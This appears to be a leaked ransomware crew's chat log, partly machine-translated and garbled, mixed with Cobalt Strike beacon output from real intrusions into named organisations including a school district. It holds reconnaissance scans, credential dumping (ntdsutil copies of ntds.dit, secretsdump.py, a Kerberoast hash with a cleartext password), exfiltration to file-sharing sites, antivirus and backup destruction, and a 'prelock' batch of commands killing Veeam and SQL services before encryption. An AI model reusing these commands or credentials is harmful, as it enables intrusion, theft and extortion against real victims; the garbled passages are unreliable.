 4576484 4517245 4560959 4561600 4565554 4569073 4576751 4576754 4574727

[!] CVE-2019-1385 : VULNERABLE
 [>] https://www.youtube.com/watch?v=K6gHnr-VkAg
[!] CVE-2019-1405 : VULNERABLE
 [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
 [>] https://github.com/apt69/COMahawk

[*] Finished. Found 2 potential vulnerabilities.
```
portscan 172.24.148.0/24 - OS undefined?
```
172.21.182.237:5985
172.21.182.237:636
172.21.182.237:593
172.21.182.237:464
172.21.182.237:389
172.21.182.238:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
172.21.182.237:139
172.21.182.237:135
172.21.182.237:88
172.21.182.237:53
172.21.182.227:5985
172.21.182.227:3389
172.21.182.227:636
172.21.182.227:593
172.21.182.227:464
172.21.182.227:389
172.21.182.227:139
172.21.182.227:135
172.21.182.227:88
172.21.182.227:80
172.21.182.227:53
172.21.182.108:3389
172.21.182.108:139
172.21.182.108:135
172.21.182.108:23
172.21.182.109:3389
172.21.182.109:139
172.21.182.109:135
172.21.182.63:5900
172.21.182.63:3389
172.21.182.63:139
172.21.182.63:135
172.21.182.60:3389
172.21.182.45:5985
172.21.182.45:3389
172.21.182.45:389
172.21.182.45:139
172.21.182.45:135
172.21.182.45:88
172.21.182.45:53
172.21.182.45:636
172.21.182.45:22 (SSH-2.0-OpenSSH_for_Windows_8.1)
172.21.182.8:600
172.21.182.8:443
172.21.182.8:135
172.21.182.8:80
172.21.182.8:22 (SSH-2.0-OpenSSH_4.3)
172.21.182.32:23
172.21.182.32:22 (SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3)
172.21.182.27:5900
172.21.182.27:88
172.21.182.27:22 (SSH-2.0-OpenSSH_7.9)
172.21.182.27:445
172.21.182.8:445
172.21.182.63:445
172.21.182.108:445
172.21.182.227:445
172.21.182.237:445
Scanner module is complete
```
took one by one, not in parallel, all 5 in /24, then in portscan /24 these subnets and wrote without it, without complete domain?
```
Pinging PMP-2K8R2-DC1.csez.zohocorpin.com [172.21.182.45] with 32 bytes of data:
Reply from 172.21.182.45: bytes=32 time=13ms TTL=126
Reply from 172.21.182.45: bytes=32 time=12ms TTL=126
Reply from 172.21.182.45: bytes=32 time=11ms TTL=126
Reply from 172.21.182.45: bytes=32 time=7ms TTL=126

Ping statistics for 172.21.182.45:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 13ms, Average = 10ms
```
```
Pinging pmp-w7-jap.csez.zohocorpin.com [172.24.148.190] with 32 bytes of data:
Reply from 172.24.148.190: bytes=32 time=26ms TTL=126
Reply from 172.24.148.190: bytes=32 time=9ms TTL=126
Reply from 172.24.148.190: bytes=32 time=8ms TTL=126
Reply from 172.24.148.190: bytes=32 time=7ms TTL=126

Ping statistics for 172.24.148.190:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 26ms, Average = 12ms
```
```
Pinging pmp-win10-64-2.csez.zohocorpin.com [192.168.237.248] with 32 bytes of data:
Reply from 192.168.237.248: bytes=32 time=12ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126

Ping statistics for 192.168.237.248:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 8ms, Maximum = 12ms, Average = 9ms
```
```
Pinging pmp2k16.csez.zohocorpin.com [172.24.147.218] with 32 bytes of data:
Reply from 172.24.147.218: bytes=32 time=23ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126

Ping statistics for 172.24.147.218:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 9ms, Maximum = 23ms, Average = 12ms
```
```
Pinging ramanathan-0501.csez.zohocorpin.com [10.59.8.42] with 32 bytes of data:
Reply from 10.59.8.42: bytes=32 time=48ms TTL=63
Reply from 10.59.8.42: bytes=32 time=72ms TTL=63
Reply from 10.59.8.42: bytes=32 time=56ms TTL=63
Reply from 10.59.8.42: bytes=32 time=63ms TTL=63

Ping statistics for 10.59.8.42:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 48ms, Maximum = 72ms, Average = 59ms
```
```
[+] host called home, sent: 409 bytes
[+] received output:
Server:  UnKnown
Address:  192.168.100.30

_ldap._tcp.csez.zohocorpin.com  SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = tsi-csez-adc.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com  SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = ruestadc.ru.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com  SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = win2k12master.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com  SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = est-adc.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com  SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = est-adc2.csez.zohocorpin.com
csez.zohocorpin.com     nameserver = est-master-server.csez.zohocorpin.com
csez.zohocorpin.com     nameserver = est-dns-slave4.csez.zohocorpin.com
csez.zohocorpin.com     nameserver = proxy-server2.csez.zohocorpin.com
csez.zohocorpin.com     nameserver = proxy-server1.csez.zohocorpin.com
csez.zohocorpin.com     nameserver = est-dns-slave3.csez.zohocorpin.com
csez.zohocorpin.com     nameserver = est-dns-slave1.csez.zohocorpin.com
csez.zohocorpin.com     nameserver = est-dns-slave2.csez.zohocorpin.com
'nltest' is not recognized as an internal or external command, operable program or batch file.
```
Ping them too.
```
pmp-2k8r2-dc1    pmp\administrator
pmp-w7-jap       pmp\administrator
pmp-win10-64-2   pmp\administrator
pmp2k16          administrator
ramanathan-0501  ZOHOCORP\ramanathan-0501
```
```
====== RDPSavedConnections ======

  Saved RDP Connection Information (S-1-5-21-1867688552-3649366528-3325780993-65238)

  RemoteHost       UsernameHint
  ----------       ------------
  pmp-2k8r2-dc1    pmp\administrator
  pmp-w7-jap       pmp\administrator
  pmp-win10-64-2   pmp\administrator
  pmp2k16          administrator
  ramanathan-0501  ZOHOCORP\ramanathan-0501

====== RDPSessions ======

  SessionID      : 0
  SessionName    : Services
  UserName       :
  DomainName     :
  State          : Disconnected
  SourceIp       :

  SessionID      : 1
  SessionName    : Console
  UserName       : raja-9298
  DomainName     : ZOHOCORP
  State          : Active
  SourceIp       :
```
```
====== LogonSessions ======

Logon Sessions (via WMI)

  UserName              : raja-9298
  Domain                : ZOHOCORP
  LogonId               : 34354149
  LogonType             : Interactive
  AuthenticationPackage : Kerberos
  StartTime             : 13-09-2020 10:40:04
  UserPrincipalName     :

  UserName              : raja-9298
  Domain                : ZOHOCORP
  LogonId               : 34354119
  LogonType             : Interactive
  AuthenticationPackage : Kerberos
  StartTime             : 13-09-2020 10:40:04
  UserPrincipalName     :

====== LSASettings ======

  auditbasedirectories           : 0
  auditbaseobjects               : 0
  Bounds                         : 00-30-00-00-00-20-00-00
  crashonauditfail               : 0
  fullprivilegeauditing          : 00
  LimitBlankPasswordUse          : 1
  NoLmHash                       : 1
  Security Packages              : ""
  Notification Packages          : scecli
  Authentication Packages        : msv1_0
  disabledomaincreds             : 0
  everyoneincludesanonymous      : 0
  forceguest                     : 0
  LsaCfgFlagsDefault             : 0
  LsaPid                         : 908
  ProductType                    : 6
  restrictanonymous              : 1
  restrictanonymoussam           : 1
  scenoapplylegacyauditpolicy    : 1
  SecureBoot                     : 1
  usemachineid                   : 0
```
```
====== LocalUsers ======

  ComputerName   : localhost
  UserName       : Administrator
  Enabled        : False
  Rid            : 500
  UserType       : Administrator
  Comment        : Built-in account for administering the computer/domain
  PwdLastSet     : 01-01-1970 00:00:00
  LastLogon      : 28-05-2019 23:10:40
  NumLogins      : 5

  ComputerName   : localhost
  UserName       : DefaultAccount
  Enabled        : False
  Rid            : 503
  UserType       : Guest
  Comment        : A user account managed by the system.
  PwdLastSet     : 01-01-1970 00:00:00
  LastLogon      : 01-01-1970 00:00:00
  NumLogins      : 0

  ComputerName   : localhost
  UserName       : Guest
  Enabled        : False
  Rid            : 501
  UserType       : Guest
  Comment        : Built-in account for guest access to the computer/domain
  PwdLastSet     : 01-01-1970 00:00:00
  LastLogon      : 01-01-1970 00:00:00
  NumLogins      : 0

  ComputerName   : localhost
  UserName       : sysadmin
  Enabled        : True
  Rid            : 1001
  UserType       : Administrator
  Comment        :
  PwdLastSet     : 19-06-2019 14:28:18
  LastLogon      : 15-08-2019 08:31:17
  NumLogins      : 31

  ComputerName   : localhost
  UserName       : WDAGUtilityAccount
  Enabled        : False
  Rid            : 504
  UserType       : Guest
  Comment        : A user account managed and used by the system for Windows Defender Application Guard scenarios.
  PwdLastSet     : 28-05-2019 22:52:09
  LastLogon      : 01-01-1970 00:00:00
  NumLogins      : 0
```
ping CSEZ.ZOHOCORPIN.COM.
```
beacon> execute-assembly /home/user/tools/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Processing files in \\CSEZ.ZOHOCORPIN.COM\sysvol\CSEZ.ZOHOCORPIN.COM\policies\
[+] received output:
[-] Invoke_3 on EntryPoint failed.
```
```
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
beacon> shell net group "enterprise admins" /dom
[*] Tasked beacon to run: net group "enterprise admins" /dom
[+] host called home, sent: 162 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

System error 5 has occurred.

Access is denied.

[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

System error 5 has occurred.

Access is denied.
```
Access is dead, tried the "domain admins" net group /dom, maybe also the VPN is not connected/
```
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x52 (82) - Local Error

Terminating program.
```
```
====== AntiVirus ======

  Windows Defender
  Kaspersky Endpoint Security for Windows
```
```
====== DotNet ======

  Installed CLR Versions
      4.0.30319

  Installed .NET Versions
      4.8.03752

  Anti-Malware Scan Interface (AMSI)
      OS supports AMSI           : True
     .NET version supports AMSI  : True
        [!] The highest .NET version is enrolled in AMSI!
```
```
====== NetworkShares ======

  Name             : ADMIN$
  Path             : C:\WINDOWS
  Description      : Remote Admin

  Name             : C$
  Path             : C:\
  Description      : Default share

  Name             : D$
  Path             : D:\
  Description      : Default share

  Name             : E$
  Path             : E:\
  Description      : Default share

  Name             : IPC$
  Path             :
  Description      : Remote IPC
```
```
====== OSInfo ======

  Hostname                      :  raja-9298
  Domain Name                   :  csez.zohocorpin.com
  Username                      :  ZOHOCORP\raja-9298
  ProductName                   :  Windows 10 Pro
  EditionID                     :  Professional
  ReleaseId                     :  1909
  Build                         :  18363.1082
  BuildBranch                   :  19h1_release
  CurrentMajorVersionNumber     :  10
  CurrentVersion                :  6.3
  Architecture                  :  AMD64
  ProcessorCount                :  12
  IsVirtualMachine              :  False
  BootTimeUtc (approx)          :  12-09-2020 18:15:41 (Total uptime : 08:15:23:11)
  HighIntegrity                 :  False
  IsLocalAdmin                  :  True
    [*] In medium integrity but user is a local administrator - UAC can be bypassed.
  CurrentTimeUtc                :  21-09-2020 09:38:52 (Local time: 21-09-2020 15:08:52)
  TimeZone                      :  India Standard Time
  TimeZoneOffset                :  05:30:00
  InputLanguage                 :  English (India)
  InstalledInputLanguages       :  English (India), Unknown layout
  MachineGuid                   :  e2c815c9-b79d-4a27-bc08-6c917f3ab98d
```
```
====== InstalledProducts ======

  Adobe Flash Player 10 Plugin                        10.2.153.1
  Adobe Shockwave Player 12.1                         12.1.3.153
  CVSNT 2.0.51
  WinCvs 2.0
  Google Chrome                                       85.0.4183.102
  Microsoft Edge                                      85.0.564.51
  Microsoft Edge Update                               1.3.135.29
  TeamViewer                                          15.3.8497
  TotalCSVConverter
  Intel(R) Wireless Bluetooth(R)                      20.60.1
  DcuMSMWrap                                          5.0.03
  Microsoft Visual C++ 2013 Redistributable (x64)     12.0.30501.0
  Realtek USB Audio                                   6.3.9600.2202
  Python 3.7.3 Tcl/Tk Support (32-bit)                3.7.3150.0
  DFUDriverSetupX64Setup                              6.6.1939.0
  Python 3.7.3 Documentation (32-bit)                 3.7.3150.0
  Thunderbolt™ Software                               17.4.79.510
  Python 3.7.3 Core Interpreter (32-bit)              3.7.3150.0
  Skype for Business Web App Plug-in                  15.8.20020.400
  Microsoft VC++ redistributables repacked.           12.0.0.0
  Java Auto Updater                                   2.8.71.15
  MySQL Installer - Community                         1.4.29.0
  Python 3.7.3 Development Libraries (32-bit)         3.7.3150.0
  Intel(R) Chipset Device Software                    10.1.17541.8066
  ManageEngine Analytics Plus                         1.0
  Google Update Helper                                1.3.35.451
  swMSM                                               12.0.0.1
  ManageEngine                                        10.0.518.W
  ZVoice - Desktop                                    1.1.9
  Mozilla Firefox 79.0 (x64 en-US)
  PuTTY release 0.74 (64-bit)
  Mercurial 3.8.1 (x64)
  FortiClient VPN                                     6.2.0.0780
  LibreOffice 6.2.4.2                                 6.2.4.2
  MySQL Server 5.7                                    5.7.26
```
SeatBelt all.
```
beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
sysadmin
ZOHOCORP\raja-9298
The command completed successfully.
```
```
beacon> shell nslookup
[*] Tasked beacon to run: nslookup
[+] host called home, sent: 39 bytes
[+] received output:
Default Server:  UnKnown
Address:  192.168.100.30
```
Domain : csez.zohocorpin.com
You got the session?
user4
til tomorrow.
1. done.
gaudyme.com
Till tomorrow by 7.00, the rest of the sessions are in the slipstream then.
servers: in hell: 2, actual: 1, alive: 1, pulled: 5
armas: by hell: 30, alive: 5, drawn: 5
encrypted: everything
and that's it, then the status for the tick and in the other folders, then we'll leave it to the dk
2 sessions left to be pinged
```
beacon> shell ping 172.16.1.247 -n 1
[*] Tasked beacon to run: ping 172.16.1.247 -n 1
[+] host called home, sent: 53 bytes
[+] received output:

Pinging 172.16.1.247 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.247:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

beacon> shell ping 172.16.1.83 -n 1
[*] Tasked beacon to run: ping 172.16.1.83 -n 1
[+] host called home, sent: 52 bytes
[+] received output:

Pinging 172.16.1.83 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.83:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

beacon> shell ping 172.16.1.61 -n 1
[*] Tasked beacon to run: ping 172.16.1.61 -n 1
[+] host called home, sent: 52 bytes
[+] received output:

Pinging 172.16.1.61 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.61:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
```
Finance, accounting, corporate files are encrypted
Disconnect the other avs and that's all, it worked
Check the folders))
have deleted
How did you disconnect then?
on the dk yes, but there's no control console. it looks like it's in the cloud)
shut down the avs?
spread on the dk readme.txt
finished with the servers
sorting servers
ok
sort servers and so on, the old scheme
all the same hash krbrst user
no, just in case throw here hash
not the fact that there all passwords
So if there are passwords, what's the point of hashes?
in cleartext, as it is clear
cleartext passwords)
there all hashes.
ptsdlt.
ptsdlt not ready work)
ready work in forms?
type `echo 1 > 1.html`
create there a file 1.htm with the text 1
happens to the truth there is no iisstart.htm
search there index file
ada
This path on the disk you mean?
i mean in inetpub is wwwroot?
there is a wwwroot
there will be a folder inetpub or something like that
check the C:\ direct
in forms or ftp
in `C:\Windows\system32\inetsrv\Config`
no configs
what about configs and so on, let's deal with forms.
decoder ntsy you run the extract
`secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local`
Put all files in one folder, there will be 4 of them together with the script.
```
pip install impacket
pip install pycrypto
pip install pyasn1
apt-get install python-dev
```
no config on the ftp in `C:\Windows\system32\inetsrv\Config`
how much archive did you get? it's too big
how to upload here
`sendspace.com` click here and password me first into the archive under the password and upload here
it is downloaded. and where do you want to upload it?
where is the physical path on the disk, look at the configs
and on both windef, as i understand on the ftp symantec
other, check the processes
edr
forms.sisd.net pulled in the same way as the external one.
check these 3
```
mail.sisd.net          40.101.49.66    Sign in to Outlook
autodiscover.sisd.net  52.97.133.216   Sign in to Outlook
forms.sisd.net         216.171.94.67   Windows Microsoft-IIS 10.0 ASP.NET IIS Windows Server
```
mail.sisd.net only external
ftp yes, I get it.
we will put them zakrepy?
and communication with the internal server, as you can see they have ftp.
subdomains that have external ips
sent you a scan of subdomains from their external main domain
> what to scan?
or again I do not understand?
sub domains
then do not understand, what does scan sub domains?
the dlls are not knocked out, now let's play with this and do another option zakrepaetsya, and we are interested nunu external
What does it mean white ips?)
check edtax on these dns with the main yes
subs only these? yes.
is there a session available for manipulation?
local 10.0.51.253
sub>> scan the subs
```
www.sisd.net           13.35.193.39    Windows Microsoft-IIS 8.5 ASP.NET 4.0.30319  Socorro Independent School District / Homepage
mail.sisd.net          40.101.49.66    Sign in to Outlook
autodiscover.sisd.net  52.97.133.216   Sign in to Outlook
sip.sisd.net           52.112.193.13   RTC 7.0
my.sisd.net            216.171.94.39   Apache PHP  my.sisd.net Log-in
portal.sisd.net        216.171.94.44
forms.sisd.net         216.171.94.67   Windows Microsoft-IIS 10.0 ASP.NET  IIS Windows Server
survey.sisd.net        216.171.94.93
archive.sisd.net       216.171.94.95
www2.sisd.net          216.171.94.96   Windows Microsoft-IIS 10.0  IIS Windows Server
ftp.sisd.net           216.171.94.101  Windows Microsoft-IIS 8.5 ASP.NET  IIS Windows Server
support.sisd.net       216.171.94.102  Apache  Socorro Independent School District
connect.sisd.net       216.171.94.133  Apache  Connect SISD
```
I'll take the hashes and put them into a confu-file, upload it to a file-sharing site and send me the local ip or the external one will be lit, pinging from inside the domain ftp.sisd.net
you have yes, trying to download ptdr.net
see hp5 min can already be installed, take the ntds and while under this account look for 2 quiet godforsaken servers without avs and other stuff.
you have it yes? account from kerba you already account yes? ok.
wait for the speed, unlike cobalt, there is no speed limit, better via armitage, about 8-10 hours, just a long time will be pumping
Listen, and koba 637 meters download?
and that's how long it all, maybe it does not download, and I'm waiting...
ok
shnyal, downloaded, made myself a token yes and jumped away to the silent servers
I will issue a fast do nashuyuchit muchesnimi just in case
it looks like yes, you probably stopped the service during execution, now can pick up files
vot it seems true
```
ntdsutil: ac in ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: cr fu c:\windows\temp\ntds
Creating snapshot...
Snapshot set {feb986c1-384e-4798-8a98-320359ac7bf8} generated successfully.
Snapshot {d21d04b5-cff8-4f62-a308-9318ca9ae6d9} mounted as C:\$SNAP_202012020302_VOLUMEC$\
Snapshot {d21d04b5-cff8-4f62-a308-9318ca9ae6d9} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202012020302_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:\windows\temp\ntds\Active Directory\ntds.dit

                  Defragmentation  Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying c:\windows\temp\ntds\registry\SYSTEM
Copying c:\windows\temp\ntds\registry\SECURITY
error 0x800706ba(The RPC server is unavailable.)
error 0x800706ba(The RPC server is unavailable.)
error 0x800706ba(The RPC server is unavailable.)
IFM media created successfully in c:\windows\temp\ntds
ifm: q
ntdsutil: q
```
It will directly say 100, it will write when it makes a full backup, wait, it says something else...
`ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q`
give the beacon output after it works
two folders and one with two files was output after ntdsutil was worked out?
vss service stopped
I want to compress ntds.dit
`c:\windows\temp\ntds\Active Directory\ntds.dit : The process cannot access the file because it is being used by another process.`
`oki I'll throw in two pins and wait for ntdsda I noticed) that's what long interruptions do) well there's one in the forum sc query vss sc start vss ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q sc stop vss If not then in both places do you make notes right now on the forum and in your personal notes no info?) remind me how, because we only tried once, I think, and that did not work) take it off via ptdstuidler no `` [+] Determining what EDR products are installed on localhost... [+] host called home, sent: 57 bytes [+] No EDR products found! Operate at your own risk! ``I'm on dk pod token c$ balloon vindo on dk? yes, to the server jumped valid? dcsync for some reason for 20 sec hesitates and does not return anything. What would that mean? $krb5tgs$23$*sccmadmin$admin.sisd.k12$MSSQLSvc/SCCM-SQL.admin.sisd.k12 juliet25- ``So, let me give you access to 2 domains at once one. @user7 there are 2 more people on the way to where the second?)and where is the other half?)helloHiHiHiVi never keep more than 10-15 active sessionsokwhen you need to do related work in 4.1client do not deleteadam 4.2 go to finally? +okay, then all have 4.2 cleaneno 4.2 I also haveona 4.1 in my kobe yesterday closed gofer?:heavy_plus_sign:+ everybody have coba 4.2?:heavy_plus_sign:+++tasks are clear to all? hello there:space_invader:add me to my colleagues in the confabs let's write from one dude to another about pass from nimbla[ ](https://mediaeveryone.com/channel/general?msg=a7bE4sNqbM6uRkvJG) flows against the current[ ](https://mediaeveryone.com/channel/general?msg=3YDeQbYx3iq2NzQik) what? in water is unusual scheme we close two networks at once? there's a couple of people in the water who are neurotic, they go to these nimbles, but they don't save their passwords anywhere. once again on the computers/servers went through\to the browsers files with passwords and what were you doing? how are you getting on? 
google help)[ ](https://mediaeveryone.com/channel/general?msg=QPvucTEsDKGjawem2) is this something that already exists, or do you have to do? which can overwrite a network drive a few times console fileshredder[ ](https://mediaeveryone.com/channel/general?msg=xNu8E3Moc2RP4oAJv) and more? to overwrite backups if it doesn't encrypt[ ](https://mediaeveryone.com/channel/general?msg=YW4zCCrXYpf7Q7Hvu) go to ssh and rm -rf-prepare more filehreddertoday I'll try over the garbage if lin will allow. it's pretty neutered there or check their disks all?we've been mashing them and mashing them and mashing them and mashing them and mashing them and mashing them and mashing them. we still haven't updated to 10[ ](https://mediaeveryone.com/channel/general?msg=Y9hzbFuc43vehpwWG) to all esx? We have to look at the confab first, clarify what kind of linux systems are there? there is a skul, there is mail (one), there are listings and files, there is access to esx all or not all at #rtpcompany-com tell me exactly without like in #rtpcompany-com *almost* everything is ready in #waterway-com the skool is rolled out, there's a problem with the mail, there's a problem with backupsBackups on the mega have not goneBackups are trying to take off no 445 anywhere, only backups are visible on the nasa for nowHow is the work progressing?hi all hello thereafter, we are trying to remove the backups from the mega in the water, let it pour in the mega in the water, and do not confuse which one or what and the mega we leave in the water in the slipIt turns out that piripezd sometimes in the mouth cleaner even missthink only water then okada it missklik in the water now .you misinform me in rt all yes only water and rt and water while loading? no in rt all unloaded? would not want to leave the mega there it's all very interesting, but can we wrap it up already today? I'm sleepy. Everything's ready for the rtp. 
i've got everything on the water except for the backups, i'll have until 3 tomorrow just to deal with itTiny whisper BDSM it's the windup's job to sufferSo let it stay like that)Good for you too generous rating "Fragile "It's not fragile, it's just fucked up. It's better for everything but dota and pbna. Fuck the windup. ``` of course fuck it, you can see how fragile it is) maybe. i don't even know why it's allowed for rdp maybe it's because it's a "remote" service if you could do that there'd be a lot of conflicts Fuck the windup... but it's the windup... i know it's stupid... it's vindaKuryu i understand that you're googling now, well when you finish googling please tell me what you found in the repository of knowledge it's a fixed protocol, not a service that you can deploy anywhere else all the rest is forward on nix - you could on vinda) seriously?) you will ALWAYS have reception on the smb on 2 ports read the documentation) ``` Googling))) not changing the port is portfwd It is possible to configure port mapping on the nasa Everything can be changed ``` read the documentation)) is a medal the last two messages - on bash.org unequivocally and no matter what it will not work everything can be changed I'm not even fucking sure that it changes in the wind in general) ok not change the port in AD and then guess which one is smb which is the rdp how will it work without smb? for example diskshare...psezek? but what's that to us dastmik also does not work[ ](https://mediaeveryone.com/channel/general?msg=3xDH4WufyJHjSg3X6) now the cards will point the way no idea, it's too complicated this time which rdb which of them smb to guess potomotnite 1 to 65535)mb port have changed[ ](https://mediaeveryone.com/channel/general?msg=Jy7qoefNuXnWSgxhx) thoughts on the subject? these remained+tok with the backups listings left in the water can not remove because there is no rdp or smb ports loaded on megutak what do you have? 
SekA because the mode is off and you haven't slept muchA very bad idea Everyone's been up since 8 am But the lightning stop he wanted to close the gtagB rtpcompany wrote tl1Till 00 work I got it right? in half an houre soon to be demolished guys who have something important left in tpc take it awayunderstood it will skip at the next attempt to network location as soon as the file location process starts on it hangs the flag immediately no? it does not conflict with each other? if from two servers, conditionally, will come to 1 arm where 1 has already started the process but if it's everywhere off then why not? it will work if you turn off the Aver by itself it's possible to do so for example from a SYSVOL balloon which is available by default to all machines domainedr can it kill? and maybe add to the batter, that at the end it would download the locker from some balloon and run? it does not conflict with each other? if two servers, so to speak, will come to 1 arm where 1 has already started the process run it without arguments and the locker will start scanning the network for available balls as it finishes locking "in itself" on the machine as you can see it slows down services and kills peeps who can hold handls + shares disks "C:\Windows\system32\net1 stop \"samss\" /y" "C:\Windows\system32\net1 stop \""veeamcatalogsvc\"" /y" "C:\Windows\system32\net1 stop \""veeamcloudsvc\"" /y" "C:\Windows\system32\net1 stop \""veeamdeploysvc\"" /y" "C:\Windows\System32\net.exe\" stop \""samss\""/y" "C:\Windows\System32\net.exe\" stop \""veeamcatalogsvc\"" /y" "C:\Windows\System32\net.exe\" stop \""veeamcloudsvc\"" /y" "C:\Windows\System32\net.exe\" stop \""veeamdeploysvc\"" /y" "C:\Windows\System32\taskkill.exe\" /IM sqlbrowser.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM sqlceip.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM sqlservr.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM sqlwriter.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM 
veeam.backup.agent.configurationservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.brokerservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.catalogdataservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.cloudservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.manager.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.mountservice.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.service.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.uiserver.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.wmiserver.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeamdeploymentsvc.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeamfilesysvsssvc.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeam.guest.interaction.proxy.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeamnfssvc.exe /F" "C:\Windows\System32\taskkill.exe\"" /IM veeamtransportsvc.exe /F" "C:\Windows\system32\taskmgr.exe\"" /4" "C:\Windows\system32\wbem\wmiprvse.exe -Embedding" "C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding" "icacls \""C:\*\" /grant Everyone:F /T /C /Q" "icacls \""D:\*\"" /grant Everyone:F /T /C /Q" ``This is an example of "prelok" batnick let's hope they won't eat it)) he has some kind of toolkit there or is it shellconcat too? in this network semantics is vicious while his loads work da, does it alreadyDep came? 172.241.27.18 https://agesk.com ---------------------------------------------------------------------------------------- 209.222.97.8:62460 TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o ``Let's keep looking for access to the population parral'naya guys uchut access to nas+1obuschem how to get into trusts in #wilsonart-com:space_invader:who do what? 
helloThank you guys, please throw sharkhromium build can certainly login with rockyu let ...what other exploits can try under ftp? anonomus and login with passwords you found does not work 10.103.1.13:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready.) 10.103.1.19:21 (220 NET+ARM FTP Server 1.0 ready.) 10.100.1.107:21 (220 Microsoft FTP Service) 10.100.1.25:21 (220 Microsoft FTP Service) 10.100.1.11:21 (220 Microsoft FTP Service) 10.100.1.4:21 (220 Microsoft FTP Service) 10.109.1.51:21 (220 ET0021B73B05EA Lexmark M3150 FTP Server NH63.CY.N640 ready) 10.100.20.15:21 (220-FileZilla Server version 0.9.44 beta) 10.104.1.13:21 (220 AP9630 Network Management Card AOS v6.0.6 FTP server ready). 10.101.1.6:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready). 10.101.1.13:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready). 10.106.1.54:21 (220 POSOfficeInvoice Lexmark M3150 FTP Server NH63.CY.N640 ready.) 10.106.1.15:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready). 10.106.1.9:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready). 10.122.1.47:21 (220 ZBR-79071 Version V75.19.10Z ready.) 10.122.1.50:21 (220 EFI FTP Print server ready.) `````` [-] 10.103.1.108:445 - Host does NOT appear vulnerable. `````` 10.103.1.108:445 (platform: 500 version: 6.1 name: BL19 domain: ORANGE_FACT) 10.250.1.41:445 